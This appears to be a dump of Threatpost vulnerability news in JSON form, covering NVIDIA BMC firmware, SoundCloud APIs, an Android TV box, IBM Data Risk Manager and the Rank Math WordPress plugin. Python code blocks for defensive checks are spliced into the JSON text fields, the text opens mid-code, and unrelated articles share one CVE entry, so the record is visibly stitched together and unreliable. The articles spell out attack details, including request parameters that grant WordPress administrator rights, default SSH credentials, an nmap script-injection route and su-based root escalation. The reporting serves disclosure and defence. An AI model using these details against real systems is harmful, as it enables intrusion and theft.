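        print(f"0x{offset:08x} {kind} key, {bits} bits, {'WEAK' if weak else 'ok'}")
```

Run it against an unpacked BMC image (for example the output of binwalk extraction) instead of FIRMWARE; a hit means the same private key is present on every device running that image, regardless of its size.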
He continued: \u201cNVIDIA uses a BMC board by Qu​anta Computers, which is based on AMI software. So to fix issues [NVIDIA] had to push several vendors to get a fix.\u201d\n\nThose vendors include:\n\n * IBM (BMC Advanced System Management)\n * Lenovo (ThinkServer Management Module)\n * Hewlett Packard Enterprise MegaRAC\n * Mikrobits (MikroTik)\n * NetApp\n * ASRockRack IPMI\n * ASUS ASMB9-iKVM\n * DEPO Computers\n * TYAN motherboards\n * Gigabyte IPMI motherboards\n * Gooxi BMC\n\n## **Nine CVEs**\n\nAs for the actual patches issued by NVIDIA on Wednesday, the most serious is tracked as CVE-2020-11483 and is rated critical. \u201cNVIDIA DGX servers contain a vulnerability in the AMI BMC firmware in which the firmware includes hard-coded credentials, which may lead to elevation of privileges or information disclosure,\u201d according to the security bulletin.\n\nThe affected DGX server models are DGX-1, DGX-2 and DGX A100.\n\nFour of the NVIDIA bugs were rated high severity (CVE-2020-11484, CVE-2020-11487, CVE-2020-11485, CVE-2020-11486), with the most serious of the four tracked as [CVE-2020-11484](<https://nvidia.custhelp.com/app/answers/detail/a_id/5010>). \u201cNVIDIA DGX servers contain a vulnerability in the AMI BMC firmware in which an attacker with administrative privileges can obtain the hash of the BMC/IPMI user password, which may lead to information disclosure,\u201d the chipmaker wrote.\n\nThree of the other patched vulnerabilities were rated medium severity and one low.\n\n\u201cHackers are well aware of AI and ML infrastructure issues and use ML infrastructure in attacks,\u201d Gordeychik said.\n\n**Hackers Put Bullseye on Healthcare: [On Nov. 18 at 2 p.m. 
EDT](<https://threatpost.com/webinars/2020-healthcare-cybersecurity-priorities-data-security-ransomware-and-patching/?utm_source=ART&utm_medium=ART&utm_campaign=Nov_webinar>) find out why hospitals are getting hammered by ransomware attacks in 2020. [Save your spot for this FREE webinar](<https://threatpost.com/webinars/2020-healthcare-cybersecurity-priorities-data-security-ransomware-and-patching/?utm_source=ART&utm_medium=ART&utm_campaign=Nov_webinar>) on healthcare cybersecurity priorities and hear from leading security voices on how data security, ransomware and patching need to be a priority for every sector, and why. Join us Wed., Nov. 18, 2-3 p.m. EDT for this [LIVE](<https://threatpost.com/webinars/2020-healthcare-cybersecurity-priorities-data-security-ransomware-and-patching/?utm_source=ART&utm_medium=ART&utm_campaign=Nov_webinar>), limited-engagement webinar.**\n", "cvss3": {}, "published": "2020-10-29T23:15:17", "type": "threatpost", "title": "NVIDIA Patches Critical Bug in High-Performance Servers", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-5135"], "modified": "2020-10-29T23:15:17", "id": "THREATPOST:AF18435BD7544B43152D5D3E8B97CE30", "href": "https://threatpost.com/nvidia-critical-bug-hpc/160762/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-10-14T22:30:31", "description": "Online music platform SoundCloud, which can be thought of as an audio-based YouTube for music creators, has addressed several security bugs in its APIs that could lead to denial-of-service (DoS) or account takeover via credential-stuffing.\n\nSoundCloud recently [sold a $75 million stake](<https://techcrunch.com/2020/02/11/music-streaming-pioneer-soundcloud-raises-75m-from-pandora-owner-siriusxm/>) to satellite radio giant SiriusXM and the two also inked a lucrative ad deal. 
SoundCloud claims to host 200 million different music tracks on its online platform.\n\nAccording to researcher Paulo Silva of Checkmarx Security Research, three different groups of security vulnerabilities were found in the platform: an authentication issue that could lead to account takeover; a rate-limiting bug that could lead to DoS; and an improper input-validation issue.\n\nThe broken-authentication issue stems from the absence of a cap on failed login attempts before the account is locked \u2013 which opens the door to unlimited brute-force attacks from cybercriminals trying to guess passwords.\n\n\u201cThe /sign-in/password endpoint of api-v2.soundcloud.com does not implement proper account lockout based on failed authentication attempts,\u201d according to Silva, in [an analysis](<https://www.checkmarx.com/blog/checkmarx-research-soundcloud-api-security-advisory>) posted Tuesday. \u201cIt solely relies on rate limiting which can be evaded using several combinations of use_agent, device_id and signature.\u201d\n\nThat means that credential stuffing \u2014 the automated process of verifying that breached pairs of usernames and passwords work for not only the services that they originated from, but also other services \u2014 could have become a real issue. Digital Shadows [recently pointed out](<https://threatpost.com/password-breaches-fueling-booming-credential-stuffing-business/125900/>) that the market for credential stuffing software and services is thriving thanks in large part to an epidemic of breaches of usernames and passwords.\n\nCheckmarx also found a related user-enumeration weakness that could be used to verify valid user account IDs as well, making it even easier to hack accounts. 
An attacker can exploit this to guess account names and then probe whether or not they actually exist.\n\n\u201cBoth /sign-in/identifier and /users/password_reset endpoints of api-v2.soundcloud.com can be used to enumerate user accounts,\u201d explained the firm. \u201cIn both cases, the endpoints provide different responses depending on whether the requested user account identifier exists or not.\u201d\n\nThe rate-limiting issue, meanwhile, stems from SoundCloud not capping how many requests a client may send, or how many track results a single request may return, on certain endpoints.\n\nFor instance, the /me/play-history/tracks API endpoint, which allows users to view recently played songs, doesn\u2019t enforce rate limiting. Thus, an attacker can send a large number of POST requests from a single machine/IP address, or can use a high-volume GET request to return hundreds of tracks at once. Sending many such requests at the same time could overwhelm the API, and the same traffic could be used to artificially inflate the demand statistics for certain tracks or artists.\n\n\u201cThe lack of rate limiting may compromise the system availability, making it vulnerable to DoS attacks,\u201d according to Checkmarx. 
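The three weaknesses above (lockout that a fresh device_id, user agent or signature resets; responses that differ for existing and non-existing accounts; no per-principal request cap) have straightforward server-side fixes. The following is an added example, not SoundCloud's or Checkmarx's code: the endpoint names come from the advisory, while the class names, thresholds, in-memory stores and the ManualClock that keeps the demo deterministic are assumptions.

```python
"""Server-side guards for the /sign-in/password, /users/password_reset and
/me/play-history/tracks weaknesses: lockout keyed by the target account, a
single generic response, and a per-principal token bucket with a result cap."""
import hashlib
import hmac
import os
import time

PBKDF2_ROUNDS = 50_000
GENERIC_FAILURE = {"status": 401, "error": "invalid credentials"}
RESET_RESPONSE = {"status": 200, "message": "If that account exists, a reset email has been sent."}


def make_credential(password, salt=None):
    salt = salt or os.urandom(16)
    return salt, hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ROUNDS)


_DUMMY_CRED = make_credential("dummy", b"\x00" * 16)   # used for unknown users


class ManualClock:
    """Deterministic clock so the demo and tests never sleep (assumption)."""
    def __init__(self):
        self.t = 0.0

    def now(self):
        return self.t

    def advance(self, seconds):
        self.t += seconds


class LoginGuard:
    """Failed-login counter keyed by the *target account*. The original endpoint
    relied on per-client rate limits that a new client identity reset; counting
    per account means the attacker's header rotation changes nothing."""
    def __init__(self, max_failures=5, lockout_seconds=900, clock=time.monotonic):
        self.max_failures, self.lockout_seconds, self.clock = max_failures, lockout_seconds, clock
        self._failures, self._locked_until = {}, {}

    def is_locked(self, account):
        return self.clock() < self._locked_until.get(account, float("-inf"))

    def record_failure(self, account):
        self._failures[account] = self._failures.get(account, 0) + 1
        if self._failures[account] >= self.max_failures:
            self._locked_until[account] = self.clock() + self.lockout_seconds
            self._failures[account] = 0

    def record_success(self, account):
        self._failures.pop(account, None)


def sign_in(guard, users, identifier, password, **client_hints):
    """/sign-in/password replacement. client_hints (device_id, user_agent,
    signature) are accepted for logging only. Unknown user, wrong password and
    locked account return the same body, and the unknown-user path still runs
    one PBKDF2 so response timing does not become the enumeration oracle."""
    if guard.is_locked(identifier):
        return dict(GENERIC_FAILURE)
    salt, stored = users.get(identifier, _DUMMY_CRED)
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ROUNDS)
    if identifier not in users or not hmac.compare_digest(stored, candidate):
        guard.record_failure(identifier)
        return dict(GENERIC_FAILURE)
    guard.record_success(identifier)
    return {"status": 200, "token": "<session token>"}


def request_password_reset(users, identifier, send_email):
    """/users/password_reset replacement: identical response either way; only
    the side effect (the email) depends on whether the account exists."""
    if identifier in users:
        send_email(identifier)
    return dict(RESET_RESPONSE)


class TokenBucket:
    """Per-principal limiter for endpoints such as /me/play-history/tracks."""
    def __init__(self, rate_per_sec, burst, clock=time.monotonic):
        self.rate, self.burst, self.clock = rate_per_sec, burst, clock
        self._state = {}

    def allow(self, principal):
        now = self.clock()
        tokens, last = self._state.get(principal, (self.burst, now))
        tokens = min(self.burst, tokens + (now - last) * self.rate)
        allowed = tokens >= 1
        self._state[principal] = (tokens - 1 if allowed else tokens, now)
        return allowed


MAX_IDS_PER_REQUEST = 50   # assumption; the advisory saw hundreds of tracks per call


def parse_track_ids(raw_ids):
    """Validate an `ids` list parameter: numeric IDs only, bounded count."""
    ids = [s for s in raw_ids.split(",") if s]
    if len(ids) > MAX_IDS_PER_REQUEST:
        raise ValueError(f"too many ids: {len(ids)} > {MAX_IDS_PER_REQUEST}")
    if not all(s.isdigit() for s in ids):
        raise ValueError("ids must be numeric")
    return [int(s) for s in ids]
```

The point of keying the guard on the account rather than on anything the client sends is that the attacker controls every header; the only value they cannot rotate is the account they are attacking. The token bucket and the `ids` cap then bound both request count and response size per principal, which is what stops the high-volume GET variant.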
The firm added: \u201cFrom a business perspective, not limiting the amount of requests to this endpoint may compromise the data integrity, since it may create biased tracks-statistics.\u201d\n\nA related issue affects the /tracks endpoint of api-v2.soundcloud.com, which Silva said does not implement proper resource limiting \u2013 also potentially leading to DoS.\n\n\u201cSince no validation is performed regarding the number of tracks IDs in the ids list, it is possible to manipulate the list to retrieve an arbitrary number of tracks in a single request,\u201d he said, adding that in testing, researchers were able to retrieve up to 689 tracks in a single request.\n\n\u201cUsing a specially crafted list of track IDs to maximize the response size, and issuing requests from several sources at the same time to deplete resources in the application layer, will make the target\u2019s system services unavailable,\u201d Silva explained.\n\nThe improper input-validation issue, meanwhile, would let an attacker submit extra-long strings in the description, title and genre fields when uploading tracks, according to the research. An exploit could build on this to attempt cross-site scripting or SQL injection.\n\n\u201cThe /tracks/{track_urn} endpoint of api-v2.soundcloud.com does not properly validate and enforce the length of [these] properties,\u201d Silva explained. \u201cIssuing requests directly to the API server puts the attacker in control of an additional 61960 bytes (total of 66160 bytes).\u201d\n\nFor its part, SoundCloud promptly fixed the problem and sent out a statement: \u201cAt SoundCloud, the security of our users\u2019 accounts is extremely important to us. We are always looking for ways to enhance the security of our platform for our users. 
We appreciate Checkmarx reaching out to discuss their findings.\u201d\n", "cvss3": {}, "published": "2020-02-12T18:48:59", "type": "threatpost", "title": "SoundCloud Tackles DoS, Account Takeover Issues", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-5135"], "modified": "2020-02-12T18:48:59", "id": "THREATPOST:4A02969D23A7147DEF39EFDE11D3094E", "href": "https://threatpost.com/soundcloud-dos-account-takeover/152838/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-10-14T22:07:48", "description": "A critical bug in the Hindotech HK1 TV Box would allow root-privilege escalation thanks to improper access control. A successful exploit would allow attackers to steal social-networking account tokens, Wi-Fi passwords, cookies, saved passwords, user-location data, message history, emails, contacts and more, researchers said.\n\nThe bug, which is awaiting a CVE assignment, comes in at 9.3 out of 10 on the [CVSS severity scale](<https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator?vector=AV:L/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H&version=3.1>), according to researchers at Sick.Codes, a security resource for developers.\n\nThe HK1 Box S905X3 TV Box is an Android-based streaming box that plugs into a TV and allows users to access YouTube, Netflix and other streaming content \u201cover-the-top,\u201d i.e., without a cable subscription. 
Users can also sign into their favorite email, music and social-networking-related apps for a full \u201csmart TV\u201d experience. It retails for under $100.\n\nThe vulnerability would allow a local, unprivileged user to escalate to root, the Sick.Codes team said [in a posting](<https://sick.codes/sick-2020-004/>) this week. At issue is a lack of authentication on the debugging interfaces of the set-top box \u2013 specifically, when connected to the device through the serial port (UART), or while using the [Android Debug Bridge](<https://developer.android.com/studio/command-line/adb>) (adb), as an unprivileged user.\n\nadb is a versatile command-line tool that lets users communicate with a device. It facilitates a variety of device actions, such as installing and debugging apps, and it provides access to a Unix shell that can be used to run a variety of commands on a device.\n\n\u201cA local attacker using adb, or a physical attacker connecting to the device through the UART serial debugging port, is dropped into a shell as the \u2018shell\u2019 user without entering a username or password,\u201d researchers explained. \u201cOnce logged in as the \u2018shell\u2019 user, the attacker can escalate to root using the /sbin/su binary which is group executable (750), or /system/xbin/su which is executable by all users (755).\u201d\n\nWith root privileges, the attacker can read the data of every app the user is signed into \u2013 paving the way for stealing access tokens, passwords, contacts, messages and more. 
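Both halves of the chain above are visible from two commands a tester types over adb: `id` (did the bridge drop us into the unprivileged `shell` user with no credentials?) and `ls -l` on the su binaries (who may execute them?). The following is an added example, not the Sick.Codes research code: it parses captured output of those commands, and the sample outputs are constructed to match the permissions the advisory quotes (750 and 755), not recorded from a device.

```python
"""Audit helpers for an Android set-top box's debug surface, run over the text
captured from `adb shell id` and `adb shell ls -l /sbin/su /system/xbin/su`."""
import re

SHELL_UID = 2000   # AID_SHELL, the uid adb's `shell` user runs as
ID_RE = re.compile(r"uid=(\d+)\((\w+)\)")
# mode, optional link count, owner, group, anything, path
LS_RE = re.compile(r"^([-dlcbps][rwxsStT-]{9})\s+(?:\d+\s+)?(\S+)\s+(\S+)\s+.*?(\S+)$")


def shell_without_auth(id_output):
    """True when `adb shell id` landed in the unprivileged 'shell' user (uid 2000)
    without any credential prompt, i.e. the bridge is open to anyone with a cable."""
    m = ID_RE.search(id_output)
    return bool(m) and int(m.group(1)) == SHELL_UID


def mode_to_octal(mode_str):
    """'-rwxr-x---' -> 0o750, '-rwsr-xr-x' -> 0o4755 (setuid/setgid/sticky folded in)."""
    bits, special = 0, 0
    for i, ch in enumerate(mode_str[1:10]):
        if ch in "rwx":
            bits |= 1 << (8 - i)
        elif ch in "sS":                         # setuid at i==2, setgid at i==5
            special |= 4 if i == 2 else 2
            bits |= (1 << (8 - i)) if ch == "s" else 0
        elif ch in "tT":                         # sticky bit on the 'other' x slot
            special |= 1
            bits |= 1 if ch == "t" else 0
    return (special << 9) | bits


def su_findings(ls_output):
    """Flag su binaries that anyone other than their owner may execute."""
    findings = []
    for line in ls_output.splitlines():
        m = LS_RE.match(line.strip())
        if not m:
            continue
        mode, owner, group, path = m.groups()
        if not (path == "su" or path.endswith("/su")):
            continue
        octal = mode_to_octal(mode)
        if octal & 0o001:
            exec_by = "everyone"
        elif octal & 0o010:
            exec_by = f"group {group}"
        else:
            exec_by = "owner only"
        findings.append({"path": path, "mode": oct(octal), "owner": owner,
                         "exec_by": exec_by, "reachable": exec_by != "owner only"})
    return findings


# constructed sample output (shaped like toybox `id` and `ls -l`)
ID_OUTPUT = "uid=2000(shell) gid=2000(shell) groups=2000(shell),1004(input),1007(log),3003(inet)"
LS_OUTPUT = """\
-rwxr-x--- 1 root root 98888 2019-06-01 10:00 /sbin/su
-rwxr-xr-x 1 root root 98888 2019-06-01 10:00 /system/xbin/su
-rwxr-xr-x 1 root shell 250000 2019-06-01 10:00 /system/bin/toybox"""

if __name__ == "__main__":
    print("adb shell open without auth:", shell_without_auth(ID_OUTPUT))
    for finding in su_findings(LS_OUTPUT):
        print(finding)
```

On a hardened build the first check should return False (adb disabled or gated by USB debugging authorization) and `su_findings` should return nothing, because production images do not ship an `su` binary at all.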
Attackers could also use the HK1 Box maliciously to sniff other devices on the same network, usually in a home-networking environment, according to the analysis.\n\n\u201cFor example, once root, the network Wi-Fi password can be read in plain text at /data/misc/wifi/WifiConfigStore.xml,\u201d researchers explained.\n\nThus far, the issue has not been addressed.\n\nThe vendor for the device is the Shenzhen Hindo Technology Co.,Ltd., based just outside of Hong Kong. The researchers were unable to contact the company (and its website, [www.hindotech.com](<http://www.hindotech.com>), was down as of the time of writing). Instead, the researchers submitted a draft advisory to Amlogic, which shares branding with the device in the States \u2013 and received no response.\n\nThreatpost has tried to contact Shenzhen Hindo but has been unsuccessful in reaching the company.\n\nThis is only the latest entertainment-related security bug. Last week, researchers disclosed the [\u2018WarezTheRemote\u2019 attack](<https://threatpost.com/comcast-tv-remote-homes-snooping/159899/>), affecting Comcast\u2019s XR11 voice remote control. A security flaw would allow attackers to remotely snoop in on victims\u2019 private conversations.\n\nThe flaw stems from Comcast\u2019s XR11, a popular voice-activated remote control for cable TV, which has more than 18 million units deployed across the U.S. The remote enables users to say the channel or content they want to watch rather than keying in the channel number or typing to search.\n\n[**On October 14 at 2 PM ET**](<https://threatpost.com/webinars/retail-security-magecart-and-the-rise-of-retail-security-threats/?utm_source=ART&utm_medium=ART&utm_campaign=oct_webinar>)** Get the latest information on the rising threats to retail e-commerce security and how to stop them. 
**[**Register today**](<https://threatpost.com/webinars/retail-security-magecart-and-the-rise-of-retail-security-threats/?utm_source=ART&utm_medium=ART&utm_campaign=oct_webinar>)** for this FREE Threatpost webinar, \u201c**[**Retail Security: Magecart and the Rise of e-Commerce Threats.**](<https://threatpost.com/webinars/retail-security-magecart-and-the-rise-of-retail-security-threats/?utm_source=ART&utm_medium=ART&utm_campaign=oct_webinar>)**\u201d Magecart and other threat actors are riding the rising wave of online retail usage and racking up big numbers of consumer victims. Find out how websites can avoid becoming the next compromise as we go into the holiday season. Join us Wednesday, Oct. 14, 2-3 PM ET for this **[**LIVE **](<https://threatpost.com/webinars/retail-security-magecart-and-the-rise-of-retail-security-threats/?utm_source=ART&utm_medium=ART&utm_campaign=oct_webinar>)**webinar.**\n", "cvss3": {}, "published": "2020-10-13T16:36:15", "type": "threatpost", "title": "Authentication Bug Opens Android Smart-TV Box to Data Theft", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-5135"], "modified": "2020-10-13T16:36:15", "id": "THREATPOST:DFC75A06F449D25EF03338C5D80C705C", "href": "https://threatpost.com/authentication-bug-android-smart-tv-data-theft/160025/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-10-14T22:26:14", "description": "UPDATED\n\nFour serious security vulnerabilities in the IBM Data Risk Manager (IDRM) have been identified that can lead to unauthenticated remote code execution (RCE) as root in vulnerable versions, according to analysis \u2013 and a proof-of-concept exploit is available.\n\nIBM weighed in on the problem this week, after a researcher went public with the bugs, one of which may end up being a zero-day issue \u2014 Big Blue is still investigating.\n\nIDRM is a software platform that aggregates threat data from disparate security systems, in order to perform enterprise security risk analysis. 
According to security researcher Pedro Ribeiro from Agile Information Security, older versions (v. 2.0.1 to 2.0.3) of the IDRM Linux virtual appliance contain bugs pertaining to authentication bypass; command injection; insecure default password; and arbitrary file download. The first three can be chained together to achieve RCE in vulnerable versions.\n\n\u201cIDRM is an enterprise security product that handles very sensitive information,\u201d Ribeiro wrote in a [Tuesday analysis](<https://github.com/pedrib/PoC/blob/master/advisories/IBM/ibm_drm/ibm_drm_rce.md>). \u201cThe hacking of an IDRM appliance might lead to a full-scale company compromise, as it stores credentials to access other security tools, not to mention it contains information about critical vulnerabilities that affect the company.\u201d\n\n**Three Chained Bugs for RCE**\n\nThe first three bugs that Ribeiro found can be combined to allow a remote attacker to gain full system compromise, according to the research.\n\nThe first is as yet unaddressed by IBM: an authentication-bypass issue in the appliance\u2019s API endpoint, /albatross/user/login. This endpoint is authenticated by a method that takes the username and sessionId of the person trying to log in, checks whether the username exists in the database, and checks whether the sessionId is associated with that username. If it all checks out, the application returns a newly generated random password for that username. However, Ribeiro demonstrated that a remote attacker can send a specially crafted request that subverts this process and allows an attacker to retrieve a valid Bearer administrative token. 
That can then be used to access various APIs.\n\n\u201cIt\u2019s also possible to login as a normal web user on the /albatross/login endpoint, which will yield an authenticated cookie instead of a token, allowing access to the web administration console,\u201d explained the researcher. \u201cIn any case\u2026authentication is now completely bypassed and we have full administrative access to IDRM.\u201d\n\nThe command-injection bug, which has a patch, meanwhile exists because the IDRM exposes an API at /albatross/restAPI/v2/nmap/run/scan that allows an authenticated user to perform nmap scans.\n\n\u201cHaving access to nmap allows running arbitrary commands, if we can upload a script file and then pass that as an argument to nmap with \u2013script=<FILE>,\u201d the researcher explained. \u201cHowever, to achieve code execution in this way, we still need to upload a file. Luckily, there is a method that processes patch files and accepts arbitrary file data, saving it to /home/a3user/agile3/patches/<FILE>.\u201d\n\nThat method is supposed to accept a patch file, process it and apply it. However, Ribeiro explained that \u201cthere are several bugs in version 2.0.2 that cause the method to abort early and fail to process the file. 
Still, the file is uploaded and kept on disk even after the method aborts.\u201d\n\nIn order to exploit this bug, an attacker would need to have an authenticated session as an administrator, which can be achieved with the first vulnerability.\n\nThe third bug, which IBM says can be solved by reconfiguring the appliance, comes from the use of hard-coded credentials: The administrative user in the IDRM virtual appliance is \u201ca3user\u201d by default.\n\n\u201cThis user is allowed to login via SSH and run sudo commands, and it is set up with a default password of \u2018idrm,'\u201d said Ribeiro.\n\nAnd, when combined with the first two bugs, this allows an unauthenticated attacker to achieve RCE as root on the IDRM virtual appliance, leading to complete system compromise, the researcher said.\n\nA Metasploit [proof-of-concept exploit module](<https://github.com/rapid7/metasploit-framework/pull/13300>) implementing the full RCE chain has been released and a video demonstration can be [found here](<https://asciinema.org/a/3nJ4lD1pD7XBfEFqkc9qPDUV2>).\n\n**Arbitrary File Download**\n\nThe fourth bug, also fixed in later versions, is a path traversal bug that comes from an improper limitation of a pathname to a restricted directory.\n\n\u201cIDRM exposes an API at /albatross/eurekaservice/fetchLogFiles that allows an authenticated user to download log files from the system,\u201d explained Ribeiro. \u201cHowever, the logFileNameList parameter contains a basic directory traversal flaw that allows an attacker to download any file off the system.\u201d\n\nHe added that exploitation is \u201cvery simple.\u201d\n\nThis flaw too can be chained. When combined with the first authentication-bypass bug, an unauthenticated attacker can download any file readable by \u201ca3user\u201d off the system, Ribeiro said. 
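Two of the IDRM bugs above are classic input-handling failures with well-known fixes: the `logFileNameList` parameter names a file that is opened relative to a directory, and the nmap endpoint passes caller-controlled arguments (including `--script=<uploaded file>`) to a program. The following is an added example, not IBM's code: the endpoint paths and the `a3user` home come from the article, while `LOG_DIR`, the function names and the allow-listed nmap options are assumptions.

```python
"""Guards for a fetchLogFiles-style download parameter and an nmap-runner endpoint."""
import os
import re

LOG_DIR = "/home/a3user/agile3/logs"   # assumed location of the downloadable logs


def resolve_log_path(base_dir, requested):
    """Return the real path for `requested` inside base_dir, or None when it
    escapes (../ sequences, absolute paths, or a symlink that resolves outside).
    Checking the *resolved* path, not the string, is what defeats encoded and
    symlink variants of the traversal."""
    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, requested))
    try:
        inside = os.path.commonpath([base, candidate]) == base
    except ValueError:                         # different drives on Windows
        inside = False
    return candidate if inside and candidate != base else None


def fetch_log_files(log_file_name_list, base_dir=LOG_DIR):
    """Every name in the list is validated before anything is opened; one bad
    entry rejects the whole request rather than silently serving the rest."""
    resolved = []
    for name in log_file_name_list:
        path = resolve_log_path(base_dir, name)
        if path is None:
            raise PermissionError(f"refusing {name!r}: outside {base_dir}")
        resolved.append(path)
    return resolved


TARGET_RE = re.compile(r"^[A-Za-z0-9][A-Za-z0-9.\-]*$")   # hostname or IPv4 literal
ALLOWED_FLAGS = frozenset({"-sT", "-sV", "-Pn", "-F"})    # no --script, -oN, -iL, ...


def build_nmap_argv(target, flags=()):
    """Build argv for subprocess.run(argv) (never shell=True). The target must
    look like a host, the flags must come from the allow list, so a request
    carrying --script=/home/a3user/agile3/patches/x.nse is rejected, not run."""
    if not TARGET_RE.match(target):
        raise ValueError(f"bad target: {target!r}")
    rejected = [f for f in flags if f not in ALLOWED_FLAGS]
    if rejected:
        raise ValueError(f"flags not permitted: {rejected}")
    return ["nmap", *flags, target]


def nmap_request_allowed(target, flags=()):
    try:
        build_nmap_argv(target, flags)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    print(resolve_log_path(LOG_DIR, "app.log"))
    print(resolve_log_path(LOG_DIR, "../../../../etc/passwd"))          # None
    print(build_nmap_argv("10.0.0.5", ["-sV"]))
    print(nmap_request_allowed("10.0.0.5", ["--script=/home/a3user/agile3/patches/x.nse"]))
```

Note that the allow list is a set of complete tokens, not a prefix check: `-sV` is accepted, `-sV --script=x` or `-oN /etc/cron.d/x` are not, and the target regex rules out anything starting with `-` so a target cannot smuggle an option in either.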
A [second Metasploit module](<https://github.com/rapid7/metasploit-framework/pull/13301>) implementing the unauthenticated file download was released and a video demo [can be found here](<https://asciinema.org/a/y6HfoaEIf8qZbn6mcUGeVhyUp>).\n\n**Patch Information and Mitigation**\n\nVersions 2.0.1 to 2.0.3 have been confirmed as vulnerable to the first three flaws, according to Ribeiro; as for the fourth issue, version 2.0.1 is not vulnerable, but v. 2.0.2 and 2.0.3 are. According to [IBM\u2019s advisory](<https://www.ibm.com/support/pages/node/6195705>), issued on April 22 after Ribeiro disclosed his findings, the command-injection vulnerability and the arbitrary-file download bug were both fixed in version 2.0.4. IBM also said that the default-password issue is a configuration choice and up to administrators to change ([guidance available here](<https://www.ibm.com/support/knowledgecenter/en/SSJQ6V_2.0.6/com.ibm.idrm.doc/install/tsk/tsk_installguide_idrm_configuration.html>)).\n\nAs for the first vulnerability, the authentication bypass, IBM said in the advisory that it is \u201cinvestigating this report and will provide further information on fix action as appropriate.\u201d\n\nThe current version of the IDRM is v. 2.0.6.\n\nInitially, Ribeiro made an attempt to coordinate disclosure with IBM via CERT/CC, but IBM did not accept the vulnerability report for review:\n\n_\u201cWe have assessed this report and closed as being out of scope for our vulnerability disclosure program since this product is only for \u2018enhanced\u2019 support paid for by our customers,\u201d according to Big Blue\u2019s response to CERT/CC. \u201cThis is outlined in our policy https://hackerone.com/ibm. 
To be eligible to participate in this program, you must not be under contract to perform security testing for IBM Corporation, or an IBM subsidiary, or IBM client within six months prior to submitting a report.\u201d_\n\nHowever, after Ribeiro made his findings public, Big Blue said the rejection was a mistake.\n\n\u201cA process error resulted in an improper response to the researcher who reported this situation to IBM,\u201d a spokesperson told Threatpost on Tuesday. \u201cWe have been working on mitigation steps and they will be discussed in a security advisory to be issued.\u201d\n\n_This article was updated at 4 p.m. ET on Tuesday, April 21 with a statement from IBM, and at 10 a.m. ET on Wednesday, April 22 with fresh advisory information from IBM._\n\n**_Worried about your cloud security in the work-from-home era? On _****_April 23 at 2 p.m. ET_****_, join DivvyCloud and Threatpost for a FREE webinar, _**[**_A Practical Guide to Securing the Cloud in the Face of Crisis_**](<https://attendee.gotowebinar.com/register/4136632530104301068?source=art>)**_. Get exclusive research insights and critical, advanced takeaways on how to avoid cloud disruption and chaos in the face of COVID-19 \u2013 and during all times of crisis. 
_**[**_Please register here_**](<https://attendee.gotowebinar.com/register/4136632530104301068?source=art>)_** for this sponsored webinar.**_\n", "cvss3": {}, "published": "2020-04-21T18:19:01", "type": "threatpost", "title": "RCE Exploit Released for IBM Data Risk Manager", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-5135"], "modified": "2020-04-21T18:19:01", "id": "THREATPOST:C9AB0B1EBE1A344DC385414BD784DFC7", "href": "https://threatpost.com/rce-exploit-ibm-data-risk-manager-no-patch/154986/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-10-14T22:26:52", "description": "A pair of security vulnerabilities in the WordPress search engine optimization (SEO) plugin, known as Rank Math, could allow remote cybercriminals to elevate privileges and install malicious redirects onto a target site, according to researchers. It\u2019s a WordPress plugin with more than 200,000 installations.\n\nAccording to researchers with Wordfence, one of the flaws is critical (10 out of 10 on the CVSSv3 vulnerability severity scale). It could allow an unauthenticated attacker to update arbitrary metadata. This can be abused to grant or revoke administrative privileges for any registered user on the site.\n\nThe second vulnerability is characterized as high-severity (7.4 on the severity scale) and could enable an unauthenticated attacker to create redirects from almost any location on the site to any destination of their choice.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nWordfence disclosed the bugs to the developer of the add-on on March 24 (its full name is \u201cWordPress SEO Plugin \u2013 Rank Math\u201d) \u2013 and CVE tracking numbers are forthcoming, researchers said, [in an analysis](<https://www.wordfence.com/blog/2020/03/critical-vulnerabilities-affecting-over-200000-sites-patched-in-rank-math-seo-plugin/>) released Tuesday. 
A patch is now available in the latest version, 1.0.41.1, so Web administrators should update their sites.\n\n**Critical Metadata Flaw**\n\nRank Math allows users to update the metadata on website posts \u2013 which is where the bug lies, according to a technical analysis published on Tuesday by Wordfence.\n\nThe plugin registers a REST-API endpoint, rankmath/v1/updateMeta, the firm explained in its breakdown. This calls a function called \u201cupdate_metadata,\u201d which could be used to update the slug on existing posts, or could be used to delete or update metadata for posts, comments and terms. This endpoint also allows for updating metadata for users.\n\nThe issue is that in non-patched versions, the endpoint fails to include a permissions check on users making changes.\n\n\u201cWordPress user permissions are stored in the usermeta table, which meant that an unauthenticated attacker could grant any registered user administrative privileges by sending a $_POST request to wp-json/rankmath/v1/updateMeta, with an objectID parameter set to the User ID to be modified, an objectType parameter set to user, a meta[wp_user_level] parameter set to 10, and a meta[wp_capabilities][administrator] parameter set to 1,\u201d the analysis noted.\n\nA nefarious type could also completely revoke an existing administrator\u2019s privileges by sending a similar request with a meta[wp_user_level] parameter and a meta[wp_capabilities] parameter set to empty values, the researchers added, effectively locking administrators out of their own sites.\n\n\u201cNote that these attacks are only the most critical possibilities. Depending on the other plugins installed on a site, the ability to update post, term and comment metadata could potentially be used for many other exploits such as cross-site scripting (XSS),\u201d the researchers commented.\n\n**Malicious Redirect Bonanza**\n\nThe Rank Math plugin also comes with an optional module that can be used to create redirects on a site. 
